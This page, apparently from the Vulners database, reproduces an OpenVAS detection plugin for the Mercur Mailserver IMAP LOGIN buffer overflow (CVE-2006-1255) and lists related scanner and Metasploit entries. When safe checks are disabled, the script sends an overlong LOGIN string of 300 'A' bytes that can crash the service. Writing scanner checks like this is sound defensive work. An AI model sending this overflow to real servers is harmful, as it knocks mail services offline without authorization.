Lucene search
K

Mercur Mailserver/Messaging version <= 5.0 IMAP Overflow Vulnerability

🗓️ 22 Aug 2008 00:00:00Reported by This script is Copyright (C) 2006 Ferdy RiphagenType 
openvas
 openvas
🔗 plugins.openvas.org👁 15 Views

Mercur Mailserver/Messaging version <= 5.0 IMAP Overflow Vulnerability. Vulnerability in the Mercur IMAP4 Servic

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Mercur Mailserver Remote Overflow
20 Mar 200600:00
nessus
Tenable Nessus
MERCUR Messaging IMAP Service Multiple Command Remote Overflow
22 Mar 200600:00
nessus
Circl
CVE-2006-1255
25 Aug 201000:00
circl
CVE
CVE-2006-1255
19 Mar 200601:00
cve
Cvelist
CVE-2006-1255
19 Mar 200601:00
cvelist
Exploit DB
Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)
20 Sep 201000:00
exploitdb
Exploit DB
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
25 Aug 201000:00
exploitdb
Metasploit
Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
31 Dec 200600:10
metasploit
Metasploit
Mercur Messaging 2005 IMAP Login Buffer Overflow
27 Dec 200622:43
metasploit
NVD
CVE-2006-1255
19 Mar 200601:02
nvd
Rows per page
# OpenVAS Vulnerability Test
# $Id: mercur_imap_buffer_overflow.nasl 8023 2017-12-07 08:36:26Z teissa $
# Description: Mercur Mailserver/Messaging version <= 5.0 IMAP Overflow Vulnerability
#
# Authors:
# Ferdy Riphagen <f[dot]riphagen[at]nsec[dot]nl>
#
# Copyright:
# Copyright (C) 2006 Ferdy Riphagen
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "The Mercur IMAP4 Service is running on the remote host.

Description :

A version of Mercur Mailserver or Messaging Server is installed
on the remote host. It is a complete messaging solution including
common functions like 'smtp/pop3/imap4-server'.

The Mercur IMAP4 Service is vulnerable to buffer overflows
by sending a special crafted 'login' command. 
An attacker can use this to crash the service, possible
execute arbitrary code and gain some access privileges on the system.";

tag_solution = "Filter access to the IMAP4 Service, so that it can be used
by trusted sources only.";

# Original advisory :
# http://archives.neohapsis.com/archives/fulldisclosure/2006-02/1837.html

if (description) {
 script_id(200050);
 script_version("$Revision: 8023 $");
 script_tag(name:"last_modification", value:"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $");
 script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
 script_tag(name:"cvss_base", value:"10.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
 
 script_bugtraq_id(17138);
 script_cve_id("CVE-2006-1255");
 script_xref(name:"OSVDB", value:"23950");

 name = "Mercur Mailserver/Messaging version <= 5.0 IMAP Overflow Vulnerability";
 script_name(name);

 script_category(ACT_MIXED_ATTACK);
  script_tag(name:"qod_type", value:"remote_banner");
 script_family("Gain a shell remotely");
 script_copyright("This script is Copyright (C) 2006 Ferdy Riphagen");

 script_dependencies("find_service.nasl");
 script_require_ports("Services/imap", 143);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
 script_xref(name : "URL" , value : "http://secunia.com/advisories/19267/");
 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/17138");
 exit(0);
}

include("imap_func.inc");
include("global_settings.inc");

port = get_kb_item("Services/imap");
if (!port) port = 143;
if( ! get_port_state(port) ) exit( 0 );

if (safe_checks()) {
 soc = open_sock_tcp(port);
 if (!soc) exit(0);

 banner = get_imap_banner(port:port);
 if (banner) debug_print("The remote IMAP4 banner is : ", banner, "\r\n");
 if (egrep(pattern:".*MERCUR.*IMAP4.Server.*(v(4\.03|5\.00))", string:banner)) {
 
  report = string("*** OpenVAS did only check for this vulnerability,\n",
	"*** by using the banner of the remote IMAP4 service.\n",
 	"*** This might be a false positive.\n\n"); 
  
  security_message(port:port, data:report);
 }
 if (soc) close(soc);
 exit(0);
}

else {
 soc = open_sock_tcp(port);
 if (!soc) exit(0);

 banner = get_imap_banner(port:port);
 if (banner) debug_print("The remote IMAP4 banner is: ", banner, "\r\n");

 if (egrep(pattern:"OK.*MERCUR IMAP4.Server", string:banner)) {
  exp = string("a0 LOGIN ", crap(data:raw_string(0x41), length:300), "\r\n");
  send(socket:soc, data:exp);

  recv = recv(socket:soc, length:1024);
  if (recv != NULL) debug_print(level: 2, "Response: ", recv, "\r\n");
  close(soc);

  soc = open_sock_tcp(port);
  if (soc) {
   send(socket:soc, data:string("a1 CAPABILITY \r\n"));
   recv2 = recv(socket:soc, length:1024);
   if (recv2 != NULL) debug_print(level: 2, "Response2: ", recv2, "\r\n");
  }
  if (!soc || (!strlen(recv2))) { 
   
   report = string("*** It was possible to crash the MERCUR IMAP4 Service.\n",
	"*** At this time the remote service does not accepting any new requests.\n",
	"*** You should check its state, and possble start it manually again.\n\n"); 
   
   security_message(port:port, data:report);
  }
 }
 if (soc) close(soc);
 exit(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation